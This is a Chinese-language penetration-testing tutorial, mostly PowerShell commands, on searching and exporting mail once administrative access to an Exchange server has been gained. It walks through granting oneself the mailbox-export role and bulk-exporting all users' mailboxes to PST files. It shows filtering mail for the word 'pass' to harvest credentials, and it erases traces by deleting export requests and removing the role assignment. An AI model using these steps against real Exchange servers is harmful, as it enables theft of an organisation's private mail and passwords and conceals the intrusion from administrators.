在渗透测试中，如果我们获得了Exchange服务器的管理权限，下一步就需要对Exchange服务器的邮件进行搜索和导出，本文将要介绍常用的两种方法，开源4个powershell脚本，分享脚本编写细节。

0x01 简介

本文将要介绍以下内容：

· 管理Exchange服务器上邮件的两种方法

· 导出邮件的两种方法

· 搜索邮件的两种方法

注：本文介绍的方法均为powershell命令。

0x02 管理Exchange服务器上邮件的两种方法

1.先使用PSSession连接Exchange服务器，进而远程管理邮件

使用PSSession连接Exchange服务器的命令：

$User = "test\administrator"

$Pass = ConvertTo-SecureString -AsPlainText DomainAdmin123! -Force

$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass

$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://Exchange01.test.com/PowerShell/ -Authentication Kerberos -Credential $Credential

Import-PSSession $Session -AllowClobber

补充：

查看PSSession：

Get-PSSession

断开PSSession：

Remove-PSSession $Session

测试命令(获得所有邮箱用户):

Get-Mailbox

2.直接在Exchange服务器上执行管理邮件的命令

测试命令(获得所有邮箱用户的名称):

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;

Get-Mailbox

注：不同Exchange版本对应的管理单元名称不同：

· Exchange 2007: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;

· Exchange 2010: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;

· Exchange 2013 & 2016: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;

补充：管理Exchange邮件的常用命令

参考资料：

https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps

(1)获得所有邮箱用户名称：

Get-Mailbox -ResultSize unlimited

默认显示1000个用户，加上-ResultSize unlimited可以获得所有用户

(2)获得所有邮箱的信息，包括邮件数和上次访问邮箱的时间

Get-Mailbox | Get-MailboxStatistics

(3)获得所有OU

Get-OrganizationalUnit

(4)通过邮件跟踪日志获得收发邮件的相关信息

参考资料：

https://docs.microsoft.com/en-us/powershell/module/exchange/mail-flow/get-messagetrackinglog?view=exchange-ps

邮件跟踪日志默认保存位置：%ExchangeInstallPath%TransportRoles\Logs\MessageTracking

查看发件人test1@test.com从2019年1月1日9:00至今发送的所有邮件的相关信息(包括发件人，收件人和邮件主题)：

Get-MessageTrackingLog -Start "01/11/2019 09:00:00" -Sender "test1@test.com"

返回的结果很杂乱，其中包括多个事件：

DSN

· Defer

· Deliver

· Send

· Receive

只筛选出发送事件，使返回结果更简洁:

Get-MessageTrackingLog -EventID send -Start "01/11/2019 09:00:00" -Sender "test1@test.com"

统计每天收发邮件数目的脚本：

https://gallery.technet.microsoft.com/office/f2af711e-defd-476d-896e-8053aa964bc5/view/Discussions

需要修改起始时间和添加加载Exchange powershell管理单元的命令。

0x03 导出邮件的两种方法

1.使用PSSession建立连接并导出邮件

参考资料：

https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/new-mailboxexportrequest?view=exchange-ps

(1)将用户添加到角色组"Mailbox Import Export"

这里以用户administrator为例：

New-ManagementRoleAssignment –Role "Mailbox Import Export" –User Administrator

补充：移除的命令

Remove-ManagementRoleAssignment -Identity "Mailbox Import Export-Administrator" -Confirm:$false

添加后再次查看进行确认：

Get-ManagementRoleAssignment –Role "Mailbox Import Export"|fl user

(2)重新启动Powershell

否则，无法使用命令New-MailboxexportRequest。

(3)导出邮件并保存

这里给出三个实例：

1.导出指定用户的所有邮件，保存到Exchange服务器的c:\test

$User = "test1"

New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\test\"+$User+".pst")

2.筛选出指定用户的body中包含单词pass的邮件，保存到Exchange服务器的c:\test

$User = "test1"

New-MailboxexportRequest -mailbox $User -ContentFilter {(body -like "*pass*")} -FilePath ("\\localhost\c$\test\"+$User+".pst")

3.导出所有邮件，保存到Exchange服务器的c:\test

Get-Mailbox -OrganizationalUnit Users -Resultsize unlimited |%{New-MailboxexportRequest -mailbox $_.name -FilePath ("\\localhost\c$\test\"+($_.name)+".pst")}

导出后会自动保存导出请求的记录，默认为30天。

如果不想保存导出请求，可以加上参数-CompletedRequestAgeLimit 0

补充：关于导出请求的相关操作。

查看邮件导出请求：

Get-MailboxExportRequest

删除具体的某个导出请求：

Remove-MailboxExportRequest -RequestQueue "Mailbox Database 2057988509" -RequestGuid 650f52ec-722b-47bb-8e73-d16a17c32129 -Confirm:$false

Remove-MailboxExportRequest -Identity 'test.com/Users/test1\MailboxExport' -Confirm:$false

注：匹配的参数从Get-MailboxExportRequest|fl的结果中获得。

删除所有导出请求：

Get-MailboxExportRequest|Remove-MailboxExportRequest -Confirm:$false